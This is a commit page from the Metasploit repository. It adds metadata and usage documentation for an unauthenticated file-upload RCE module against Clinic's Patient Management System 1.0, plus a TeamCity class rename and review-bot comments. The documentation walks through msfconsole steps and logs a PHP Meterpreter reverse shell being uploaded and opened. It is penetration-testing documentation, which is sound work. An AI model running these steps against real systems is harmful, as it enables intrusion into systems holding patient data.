
Commit

Merge remote-tracking branch 'upstream/master'
certcc-ghbot committed Dec 18, 2024
2 parents 4a5d81d + 37eaa29 commit 7fb4c3e
Showing 7 changed files with 432 additions and 5 deletions.
64 changes: 63 additions & 1 deletion db/modules_metadata_base.json
Expand Up @@ -58136,7 +58136,7 @@
"https"
],
"targets": null,
"mod_time": "2024-11-04 16:58:32 +0000",
"mod_time": "2024-12-17 14:27:41 +0000",
"path": "/modules/auxiliary/scanner/teamcity/teamcity_login.rb",
"is_install_path": true,
"ref_name": "scanner/teamcity/teamcity_login",
Expand Down Expand Up @@ -102724,6 +102724,68 @@
"session_types": false,
"needs_cleanup": true
},
"exploit_multi/http/clinic_pms_fileupload_rce": {
"name": "Clinic's Patient Management System 1.0 - Unauthenticated RCE",
"fullname": "exploit/multi/http/clinic_pms_fileupload_rce",
"aliases": [

],
"rank": 600,
"disclosure_date": "2022-10-31",
"type": "exploit",
"author": [
"Aaryan Golatkar",
"Oğulcan Hami Gül"
],
"description": "This module exploits an unauthenticated file upload vulnerability in Clinic's\n Patient Management System 1.0. An attacker can upload a PHP web shell and execute\n it by leveraging directory listing enabled on the `/pms/user_images` directory.",
"references": [
"EDB-51779",
"CVE-2022-40471",
"URL-https://www.cve.org/CVERecord?id=CVE-2022-40471",
"URL-https://drive.google.com/file/d/1m-wTfOL5gY3huaSEM3YPSf98qIrkl-TW/view"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Clinic Patient Management System 1.0"
],
"mod_time": "2024-12-17 21:39:30 +0000",
"path": "/modules/exploits/multi/http/clinic_pms_fileupload_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/clinic_pms_fileupload_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"artifacts-on-disk"
]
},
"session_types": false,
"needs_cleanup": true
},
"exploit_multi/http/clipbucket_fileupload_exec": {
"name": "ClipBucket beats_uploader Unauthenticated Arbitrary File Upload",
"fullname": "exploit/multi/http/clipbucket_fileupload_exec",
116 changes: 116 additions & 0 deletions documentation/modules/exploit/multi/http/clinic_pms_fileupload_rce.md
@@ -0,0 +1,116 @@
## Vulnerable Application
The Clinic's Patient Management System (CPMS) 1.0 is vulnerable to Unauthenticated Remote Code Execution (RCE) due to a file upload vulnerability.
This exploit allows an attacker to upload arbitrary files, such as a PHP web shell, which can then be executed remotely.
The exploitation occurs because of a misconfiguration in the server, specifically a lack of file validation for uploads and the presence of
a directory listing feature in `/pms/user_images`.
This enables an attacker to upload a PHP file and access it via a publicly accessible URL, executing arbitrary PHP code.

## Verification Steps

### Vulnerable Application Installation Setup
1. Install Clinic's Patient Management System 1.0 on your web server.
- Download the Web Application from [here](https://www.sourcecodester.com/download-code?nid=15453&title=Clinic%27s+Patient+Management+System+in+PHP%2FPDO+Free+Source+Code)
- For **Windows**
- [ ] Open your XAMPP Control Panel and start Apache and MySQL.
- [ ] Extract the downloaded source code zip file.
- [ ] Copy the extracted source code folder and paste it into the XAMPP's "htdocs" directory.
- [ ] Browse the PHPMyAdmin in a browser. i.e. http://localhost/phpmyadmin
- [ ] Create a new database naming `pms_db`.
- [ ] Import the provided SQL file. The file is known as pms_db.sql located inside the database folder.
- [ ] Browse the Clinic Patient Management System in a browser. i.e. http://localhost/pms/

- For **Linux**
- [ ] Start Apache2 & MySQL with the command `sudo systemctl start apache2 && sudo systemctl start mysql`
- [ ] Install PHPMyAdmin with the command `sudo apt install phpmyadmin -y`
- [ ] Edit `/etc/apache2/apache2.conf` by appending this line: `Include /etc/phpmyadmin/apache.conf`
- [ ] Extract the downloaded source code zip file into "/var/www/html" directory
- [ ] Next steps are similar to the ones for Windows, so follow that

2. Start `msfconsole` and load the exploit module:
```bash
msfconsole
use exploit/multi/http/clinic_pms_fileupload_rce
```

3. Set the required options:
```bash
set rport <port>
set rhost <ip>
set targeturi /pms
```

4. Check if the target is vulnerable:
```bash
check
```

If the target is vulnerable, you will see a message indicating that the target is susceptible to the exploit:
```
[+] <IP> The target is vulnerable.
```

5. Set up the listener for the exploit:
```bash
set lport <port>
set lhost <ip>
```

6. Launch the exploit:
```bash
exploit
```

7. If successful, you will receive a PHP Meterpreter shell.

## Options
- `TARGETURI`: (Required) The base path to the Clinic Patient Management System (default: `/pms`).
- `LISTING_DELAY`: (Optional) The time to wait before fetching the directory listing after uploading the shell (default: `2` seconds).


## Scenarios

### Clinic's Patient Management System on a Linux Target
```bash
msf exploit(multi/http/clinic_pms_fileupload_rce) > check
[*] Checking if target is vulnerable...
[+] 127.0.0.1:80 - The target is vulnerable.

msf exploit(multi/http/clinic_pms_fileupload_rce) > exploit
[*] Started reverse TCP handler on 192.168.1.104:4444
[*] Detected OS: linux
[*] Target is Linux/Unix. Using PHP Meterpreter payload with unlink_self.
[*] Uploading PHP Meterpreter payload as zuX7FDRe.php...
[+] Payload uploaded successfully!
[*] Executing the uploaded shell at /pms/user_images/1734340436zuX7FDRe.php...
[*] Sending stage (40004 bytes) to 192.168.1.104
[*] Meterpreter session 1 opened (192.168.1.104:4444 -> 192.168.1.104:48290) at 2024-12-16 14:43:59 +0530

meterpreter > sysinfo
Computer : kali
OS : Linux kali 6.11.2-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.11.2-1kali1 (2024-10-15) x86_64
Meterpreter : php/linux
meterpreter >
```
### Clinic's Patient Management System on a Windows Target
```bash
msf exploit(multi/http/clinic_pms_fileupload_rce) > check
[*] Checking if target is vulnerable...
[+] 192.168.1.103:80 - The target is vulnerable.

msf exploit(multi/http/clinic_pms_fileupload_rce) > exploit
[*] Started reverse TCP handler on 192.168.1.104:4444
[*] Detected OS: winnt
[*] Target is Windows. Using standard PHP Meterpreter payload.
[*] Uploading PHP Meterpreter payload as lgTprVq5.php...
[+] Payload uploaded successfully!
[*] Executing the uploaded shell at /pms/user_images/1734341267lgTprVq5.php...
[*] Sending stage (40004 bytes) to 192.168.1.103
[*] Meterpreter session 2 opened (192.168.1.104:4444 -> 192.168.1.103:60615) at 2024-12-16 14:57:43 +0530

meterpreter > sysinfo
Computer : DESKTOP-VE9J36K
OS : Windows NT DESKTOP-VE9J36K 10.0 build 19045 (Windows 10) AMD64
Meterpreter : php/windows
meterpreter >
```
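Review bot: the documentation never says what happens to the uploaded file once the session is open. The Linux scenario log reports `Using PHP Meterpreter payload with unlink_self`, while the Windows scenario reports `Using standard PHP Meterpreter payload`, and the module metadata added in this same commit declares `artifacts-on-disk` with `needs_cleanup: true`; a sentence under `## Scenarios` (or a short "Cleanup" note) stating that on Windows targets the file in `/pms/user_images/` (for example `1734341267lgTprVq5.php` in the log) stays on disk and must be removed by hand would tell operators what to clean up after an engagement. Two smaller points: the setup steps use task-list syntax (`- [ ]`), which renders as unchecked checkboxes in the module docs, so plain `-` bullets would read better; and the `LISTING_DELAY` description should explain why the listing is needed at all, since the log shows the server storing the upload under a timestamp-prefixed name (`zuX7FDRe.php` is executed as `1734340436zuX7FDRe.php`), meaning the module has to read the directory listing to learn the final filename, and that is also the point a defender removes by disabling directory indexing on that path.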
2 changes: 1 addition & 1 deletion lib/metasploit/framework/login_scanner/teamcity.rb
Expand Up @@ -7,7 +7,7 @@ module LoginScanner
# This is the LoginScanner class for dealing with JetBrains TeamCity instances.
# It is responsible for taking a single target, and a list of credentials
# and attempting them. It then saves the results.
class Teamcity < HTTP
class TeamCity < HTTP

module Crypto
# https://github.com/openssl/openssl/blob/a08a145d4a7e663dd1e973f06a56e983a5e916f7/crypto/rsa/rsa_pk1.c#L125
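Review bot: renaming the class from `Teamcity` to `TeamCity` changes a public constant, so any out-of-tree code or local module that still references `Metasploit::Framework::LoginScanner::Teamcity` will raise `NameError` after this change. The in-tree call site in `modules/auxiliary/scanner/teamcity/teamcity_login.rb` and the autoload inflection in `lib/msf_autoload.rb` are updated in this same commit, but consider adding a one-line compatibility alias (`Teamcity = TeamCity`) with a deprecation comment, or at least a release-note entry, so external users are not broken without warning.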
3 changes: 2 additions & 1 deletion lib/msf_autoload.rb
Expand Up @@ -297,7 +297,8 @@ def custom_inflections
'appapi' => 'AppApi',
'uds_errors' => 'UDSErrors',
'smb_hash_capture' => 'SMBHashCapture',
'rex_ntlm' => 'RexNTLM'
'rex_ntlm' => 'RexNTLM',
'teamcity' => 'TeamCity'
}
end

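Review bot: the new `'teamcity' => 'TeamCity'` inflection is global to the autoloader, so every file or directory segment named `teamcity` on an autoloaded path will now be expected to define `TeamCity` rather than `Teamcity`; worth confirming there is no other `teamcity.rb` or `teamcity/` directory on such a path that still uses the old spelling. The entry itself follows the existing pattern (`'smb_hash_capture' => 'SMBHashCapture'`, `'rex_ntlm' => 'RexNTLM'`) and the trailing comma added to the `rex_ntlm` line is the correct change to keep the hash literal valid.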
2 changes: 1 addition & 1 deletion modules/auxiliary/scanner/teamcity/teamcity_login.rb
Expand Up @@ -93,7 +93,7 @@ def run_host(ip)
ssl: datastore['SSL']
)

scanner = Metasploit::Framework::LoginScanner::Teamcity.new(scanner_opts)
scanner = Metasploit::Framework::LoginScanner::TeamCity.new(scanner_opts)
run_scanner(scanner)
end
end

0 comments on commit 7fb4c3e
